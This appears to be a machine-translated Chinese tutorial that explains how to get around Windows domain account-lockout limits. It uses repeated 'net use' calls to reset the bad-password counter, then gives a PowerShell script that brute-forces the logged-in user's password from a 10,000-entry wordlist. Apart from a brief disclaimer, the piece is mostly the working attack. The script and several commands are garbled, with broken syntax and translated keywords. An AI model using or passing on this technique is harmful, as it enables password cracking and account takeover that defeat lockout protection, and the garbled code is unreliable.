黑客绕过域账户认证失败锁定次数限制的技巧

*文中仅用以教育目的。切忌对没经受权的计算机系统实行安全测试。

*文中仅用以教育目的。切忌对没经受权的计算机系统实行安全测试。

有很多获得用户账号登陆密码的好方法,这只是另一种方式。好的,让我们开始吧。核心理念是,如果用户想要进行身份证验证,他们可以运作“net use \\%computername%/u:%username%”指令,该指令可以再次恳求身份证验证并初始化锁住计数器。

在此,您需要从Microsoft下载远程服务器可视化工具并安装一个小的PowerShell脚本来显示我的JoeUser账号信息并将其锁住。 Get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount,lockedout 

选择名字,lastbadpasswordattempt,badpwdcount,lockedout | format-grid -auto 在我的当地对策中,您可以看我还在3次没用登陆试着后锁住(我从Microsoft获得的默认设置安装值)。   

下一步我将键入错误的登陆密码,对话框将记录我的错误计数器。  

现在我将使用该指令祛除错误的登陆密码:“Net use \\%computername%/u:%username%”温馨提醒,也没有特定登陆密码。我以用户身分登陆,也许使用当前用户的句意进行身份证验证并祛除错误的登陆密码计数器!   

现在我能使用这种技术来激话我的登陆密码。唯一的短处就是我必须在每一次设置后全部删除共亨。比如,现在我已经进行了共享设置,如果我试着将设置密码为 我将接到此新消息

但是,只有一个指令是“Net Use/Delete \\%computername%”  

经过正式检测,我使用了Daniel Miesslers SecLists的前10000名登陆密码目录进行爆燃。内部也有正确的登陆密码。 $ userVar=Get-ChildItem env:登录名 $ uname=$ userVar.Value $ computerVar=Get-ChildItem env: computername $ computerName=$ computerVar.Value $ ErrorActionPreference='Stop'$ hooray='PasswordNotFoun'$ CurrentPath='C: \ Users \ Public'$ FileName='10 -million-password-list-mitre-10000.txt'$ FName='$ CurrentPath \ $ FileName 'foreach([System.UND.File]中的$ value: ReadLines($ Fname)) {     $ passAttempt=('net use \\'+ $ computerName +'''+ $ value +'''+'/u:'+ $ uname)    试着    {       写輸出('试着登陆密码'+ $ value)        $ output=Invoke-Expression $ passAttempt | Out-Null       $ hooray=$ value       写輸出('找到用户登陆密码:'+ $ value)        $ reset=('et use \\'+ $ computername +'/u:'+ $ uname)        Invoke-Expression $ reset | Out-Null       $ deleteShare=('net use/delete \\'+ $ computername)        Invoke-Expression $ deleteShare | Out-Null       break   }     catch    {        $ reset=('et use \\'+ $ computername +'/u:'+ $ uname)        Invoke-Expression $ reset | Out-Null       $ deleteShare=('et use/delete \\'+ $ computername)        Invoke-Expression $ deleteShare | Out-Null   } } 写服务器'登陆密码是:'$ hooray